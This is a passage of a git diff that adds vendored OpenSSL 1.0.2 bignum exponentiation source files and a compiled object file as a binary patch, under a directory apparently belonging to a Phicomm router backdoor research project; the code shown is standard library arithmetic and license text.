+        BNerr(BN_F_BN_MOD_EXP_MONT_WORD, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return -1;
+    }
+
+    bn_check_top(p);
+    bn_check_top(m);
+
+    if (!BN_is_odd(m)) {
+        BNerr(BN_F_BN_MOD_EXP_MONT_WORD, BN_R_CALLED_WITH_EVEN_MODULUS);
+        return (0);
+    }
+    if (m->top == 1)
+        a %= m->d[0];           /* make sure that 'a' is reduced */
+
+    bits = BN_num_bits(p);
+    if (bits == 0) {
+        /* x**0 mod 1 is still zero. */
+        if (BN_is_one(m)) {
+            ret = 1;
+            BN_zero(rr);
+        } else
+            ret = BN_one(rr);
+        return ret;
+    }
+    if (a == 0) {
+        BN_zero(rr);
+        ret = 1;
+        return ret;
+    }
+
+    BN_CTX_start(ctx);
+    d = BN_CTX_get(ctx);
+    r = BN_CTX_get(ctx);
+    t = BN_CTX_get(ctx);
+    if (d == NULL || r == NULL || t == NULL)
+        goto err;
+
+    if (in_mont != NULL)
+        mont = in_mont;
+    else {
+        if ((mont = BN_MONT_CTX_new()) == NULL)
+            goto err;
+        if (!BN_MONT_CTX_set(mont, m, ctx))
+            goto err;
+    }
+
+    r_is_one = 1;               /* except for Montgomery factor */
+
+    /* bits-1 >= 0 */
+
+    /* The result is accumulated in the product r*w. */
+    w = a;                      /* bit 'bits-1' of 'p' is always set */
+    for (b = bits - 2; b >= 0; b--) {
+        /* First, square r*w. */
+        next_w = w * w;
+        if ((next_w / w) != w) { /* overflow */
+            if (r_is_one) {
+                if (!BN_TO_MONTGOMERY_WORD(r, w, mont))
+                    goto err;
+                r_is_one = 0;
+            } else {
+                if (!BN_MOD_MUL_WORD(r, w, m))
+                    goto err;
+            }
+            next_w = 1;
+        }
+        w = next_w;
+        if (!r_is_one) {
+            if (!BN_mod_mul_montgomery(r, r, r, mont, ctx))
+                goto err;
+        }
+
+        /* Second, multiply r*w by 'a' if exponent bit is set. */
+        if (BN_is_bit_set(p, b)) {
+            next_w = w * a;
+            if ((next_w / a) != w) { /* overflow */
+                if (r_is_one) {
+                    if (!BN_TO_MONTGOMERY_WORD(r, w, mont))
+                        goto err;
+                    r_is_one = 0;
+                } else {
+                    if (!BN_MOD_MUL_WORD(r, w, m))
+                        goto err;
+                }
+                next_w = a;
+            }
+            w = next_w;
+        }
+    }
+
+    /* Finally, set r:=r*w. */
+    if (w != 1) {
+        if (r_is_one) {
+            if (!BN_TO_MONTGOMERY_WORD(r, w, mont))
+                goto err;
+            r_is_one = 0;
+        } else {
+            if (!BN_MOD_MUL_WORD(r, w, m))
+                goto err;
+        }
+    }
+
+    if (r_is_one) {             /* can happen only if a == 1 */
+        if (!BN_one(rr))
+            goto err;
+    } else {
+        if (!BN_from_montgomery(rr, r, mont, ctx))
+            goto err;
+    }
+    ret = 1;
+ err:
+    if ((in_mont == NULL) && (mont != NULL))
+        BN_MONT_CTX_free(mont);
+    BN_CTX_end(ctx);
+    bn_check_top(rr);
+    return (ret);
+}
+
+/* The old fallback, simple version :-) */
+int BN_mod_exp_simple(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                      const BIGNUM *m, BN_CTX *ctx)
+{
+    int i, j, bits, ret = 0, wstart, wend, window, wvalue;
+    int start = 1;
+    BIGNUM *d;
+    /* Table of variables obtained from 'ctx' */
+    BIGNUM *val[TABLE_SIZE];
+
+    if (BN_get_flags(p, BN_FLG_CONSTTIME) != 0) {
+        /* BN_FLG_CONSTTIME only supported by BN_mod_exp_mont() */
+        BNerr(BN_F_BN_MOD_EXP_SIMPLE, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return -1;
+    }
+
+    bits = BN_num_bits(p);
+
+    if (bits == 0) {
+        ret = BN_one(r);
+        return ret;
+    }
+
+    BN_CTX_start(ctx);
+    d = BN_CTX_get(ctx);
+    val[0] = BN_CTX_get(ctx);
+    if (!d || !val[0])
+        goto err;
+
+    if (!BN_nnmod(val[0], a, m, ctx))
+        goto err;               /* 1 */
+    if (BN_is_zero(val[0])) {
+        BN_zero(r);
+        ret = 1;
+        goto err;
+    }
+
+    window = BN_window_bits_for_exponent_size(bits);
+    if (window > 1) {
+        if (!BN_mod_mul(d, val[0], val[0], m, ctx))
+            goto err;           /* 2 */
+        j = 1 << (window - 1);
+        for (i = 1; i < j; i++) {
+            if (((val[i] = BN_CTX_get(ctx)) == NULL) ||
+                !BN_mod_mul(val[i], val[i - 1], d, m, ctx))
+                goto err;
+        }
+    }
+
+    start = 1;                  /* This is used to avoid multiplication etc
+                                 * when there is only the value '1' in the
+                                 * buffer. */
+    wvalue = 0;                 /* The 'value' of the window */
+    wstart = bits - 1;          /* The top bit of the window */
+    wend = 0;                   /* The bottom bit of the window */
+
+    if (!BN_one(r))
+        goto err;
+
+    for (;;) {
+        if (BN_is_bit_set(p, wstart) == 0) {
+            if (!start)
+                if (!BN_mod_mul(r, r, r, m, ctx))
+                    goto err;
+            if (wstart == 0)
+                break;
+            wstart--;
+            continue;
+        }
+        /*
+         * We now have wstart on a 'set' bit, we now need to work out how bit
+         * a window to do.  To do this we need to scan forward until the last
+         * set bit before the end of the window
+         */
+        j = wstart;
+        wvalue = 1;
+        wend = 0;
+        for (i = 1; i < window; i++) {
+            if (wstart - i < 0)
+                break;
+            if (BN_is_bit_set(p, wstart - i)) {
+                wvalue <<= (i - wend);
+                wvalue |= 1;
+                wend = i;
+            }
+        }
+
+        /* wend is the size of the current window */
+        j = wend + 1;
+        /* add the 'bytes above' */
+        if (!start)
+            for (i = 0; i < j; i++) {
+                if (!BN_mod_mul(r, r, r, m, ctx))
+                    goto err;
+            }
+
+        /* wvalue will be an odd number < 2^window */
+        if (!BN_mod_mul(r, r, val[wvalue >> 1], m, ctx))
+            goto err;
+
+        /* move the 'window' down further */
+        wstart -= wend + 1;
+        wvalue = 0;
+        start = 0;
+        if (wstart < 0)
+            break;
+    }
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    bn_check_top(r);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_exp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_exp.o
new file mode 100644
index 0000000000000000000000000000000000000000..97aa04c3d18528e37097410897f2d765cfb45022
GIT binary patch
literal 13224
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_exp2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_exp2.c
new file mode 100644
index 0000000..43fd204
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_exp2.c
@@ -0,0 +1,303 @@
+/* crypto/bn/bn_exp2.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+#define TABLE_SIZE      32
+
+int BN_mod_exp2_mont(BIGNUM *rr, const BIGNUM *a1, const BIGNUM *p1,
+                     const BIGNUM *a2, const BIGNUM *p2, const BIGNUM *m,
+                     BN_CTX *ctx, BN_MONT_CTX *in_mont)
+{
+    int i, j, bits, b, bits1, bits2, ret =
+        0, wpos1, wpos2, window1, window2, wvalue1, wvalue2;
+    int r_is_one = 1;
+    BIGNUM *d, *r;
+    const BIGNUM *a_mod_m;
+    /* Tables of variables obtained from 'ctx' */
+    BIGNUM *val1[TABLE_SIZE], *val2[TABLE_SIZE];
+    BN_MONT_CTX *mont = NULL;
+
+    bn_check_top(a1);
+    bn_check_top(p1);
+    bn_check_top(a2);
+    bn_check_top(p2);
+    bn_check_top(m);
+
+    if (!(m->d[0] & 1)) {
+        BNerr(BN_F_BN_MOD_EXP2_MONT, BN_R_CALLED_WITH_EVEN_MODULUS);
+        return (0);
+    }
+    bits1 = BN_num_bits(p1);
+    bits2 = BN_num_bits(p2);
+    if ((bits1 == 0) && (bits2 == 0)) {
+        ret = BN_one(rr);
+        return ret;
+    }
+
+    bits = (bits1 > bits2) ? bits1 : bits2;
+
+    BN_CTX_start(ctx);
+    d = BN_CTX_get(ctx);
+    r = BN_CTX_get(ctx);
+    val1[0] = BN_CTX_get(ctx);
+    val2[0] = BN_CTX_get(ctx);
+    if (!d || !r || !val1[0] || !val2[0])
+        goto err;
+
+    if (in_mont != NULL)
+        mont = in_mont;
+    else {
+        if ((mont = BN_MONT_CTX_new()) == NULL)
+            goto err;
+        if (!BN_MONT_CTX_set(mont, m, ctx))
+            goto err;
+    }
+
+    window1 = BN_window_bits_for_exponent_size(bits1);
+    window2 = BN_window_bits_for_exponent_size(bits2);
+
+    /*
+     * Build table for a1:   val1[i] := a1^(2*i + 1) mod m  for i = 0 .. 2^(window1-1)
+     */
+    if (a1->neg || BN_ucmp(a1, m) >= 0) {
+        if (!BN_mod(val1[0], a1, m, ctx))
+            goto err;
+        a_mod_m = val1[0];
+    } else
+        a_mod_m = a1;
+    if (BN_is_zero(a_mod_m)) {
+        BN_zero(rr);
+        ret = 1;
+        goto err;
+    }
+
+    if (!BN_to_montgomery(val1[0], a_mod_m, mont, ctx))
+        goto err;
+    if (window1 > 1) {
+        if (!BN_mod_mul_montgomery(d, val1[0], val1[0], mont, ctx))
+            goto err;
+
+        j = 1 << (window1 - 1);
+        for (i = 1; i < j; i++) {
+            if (((val1[i] = BN_CTX_get(ctx)) == NULL) ||
+                !BN_mod_mul_montgomery(val1[i], val1[i - 1], d, mont, ctx))
+                goto err;
+        }
+    }
+
+    /*
+     * Build table for a2:   val2[i] := a2^(2*i + 1) mod m  for i = 0 .. 2^(window2-1)
+     */
+    if (a2->neg || BN_ucmp(a2, m) >= 0) {
+        if (!BN_mod(val2[0], a2, m, ctx))
+            goto err;
+        a_mod_m = val2[0];
+    } else
+        a_mod_m = a2;
+    if (BN_is_zero(a_mod_m)) {
+        BN_zero(rr);
+        ret = 1;
+        goto err;
+    }
+    if (!BN_to_montgomery(val2[0], a_mod_m, mont, ctx))
+        goto err;
+    if (window2 > 1) {
+        if (!BN_mod_mul_montgomery(d, val2[0], val2[0], mont, ctx))
+            goto err;
+
+        j = 1 << (window2 - 1);
+        for (i = 1; i < j; i++) {
+            if (((val2[i] = BN_CTX_get(ctx)) == NULL) ||
